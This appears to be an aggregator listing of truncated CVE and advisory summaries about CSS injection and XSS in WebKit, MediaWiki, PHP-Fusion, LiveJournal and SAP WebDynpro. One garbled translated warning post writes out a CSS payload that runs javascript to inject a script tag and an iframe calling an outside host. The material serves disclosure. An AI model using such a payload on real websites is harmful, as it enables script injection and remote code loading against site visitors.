CVE-2011-0161

CVE-2011-0161 affects WebKit as used in Apple Safari before 5.0.4 and iOS before 4.3. The vulnerability arises from how the Attr.style accessor is handled, allowing remote attackers to bypass the Same Origin Policy and inject CSS token sequences via a crafted website. The described impact is that...

FreeBSD : mediawiki -- multiple vulnerabilities (8d04cfbd-344d-11e0-8669-0025222482c5)

Medawiki reports : An arbitrary script inclusion vulnerability was discovered. The vulnerability only allows execution of files with names ending in '.php' which are already present in the local filesystem. Only servers running Microsoft Windows and possibly Novell Netware are affected. Despite...

DEBIAN-CVE-2011-0047

Cross-site scripting XSS vulnerability in MediaWiki before 1.16.2 allows remote attackers to inject arbitrary web script or HTML via crafted Cascading Style Sheets CSS comments, aka "CSS injection vulnerability."...

CVE-2011-0047

Cross-site scripting XSS vulnerability in MediaWiki before 1.16.2 allows remote attackers to inject arbitrary web script or HTML via crafted Cascading Style Sheets CSS comments, aka "CSS injection vulnerability."...

CVE-2011-0047

CVE-2011-0047 is a cross-site scripting (XSS) vulnerability in MediaWiki prior to 1.16.2, exploitable by remote attackers via crafted CSS comments to inject script/HTML. Affected component: MediaWiki core; root cause: improper handling of CSS comment content leading to HTML/JS injection; impact: ...

mediawiki -- multiple vulnerabilities

Medawiki reports: An arbitrary script inclusion vulnerability was discovered. The vulnerability only allows execution of files with names ending in ".php" which are already present in the local filesystem. Only servers running Microsoft Windows and possibly Novell Netware are affected. Despite...

CVE-2010-1647

Cross-site scripting XSS vulnerability in MediaWiki 1.15 before 1.15.4 and 1.16 before 1.16 beta 3 allows remote attackers to inject arbitrary web script or HTML via crafted Cascading Style Sheets CSS strings that are processed as script by Internet Explorer...

[Onapsis Security Advisory 2010-003] SAP WebDynpro Runtime XSS/CSS Injection

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Onapsis Security Advisory 2010-00: SAP WebDynpro Runtime XSS/CSS Injection This advisory can be downloaded from http://www.onapsis.com/research.html. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand...

Use CSS hung it using the method!- Vulnerability warning-the black bar safety net

Inserted into the css or the head of the style can be... If the plug portion of the style in this writing style type="text/css" !-- body background-image: url'javascript:document. write"script src=aa. js/script"' -- /style Call the aa. js content document. write"iframe src=http://www. winshell. c...

CVE-2005-2401

PHP-Fusion allows remote attackers to inject arbitrary Cascading Style Sheets CSS via the BBCode color tag...

CVE-2005-2401

PHP-Fusion is affected by CVE-2005-2401: remote attackers can inject arbitrary CSS through the BBCode color tag in posts. The related Nessus plugin and CVE records indicate this affects PHP-Fusion builds around the 6.0x line (e.g.,

LiveJournal 1.1 - CSS HTML Injection

LiveJournal 1.1 - CSS HTML Injection source: https://www.securityfocus.com/bid/9727/info LiveJournal is reportedly prone to HTML injection via Cascading Style Sheet CSS tags. It is possible to inject hostile HTML and script code into journal entries through this vulnerability. This could...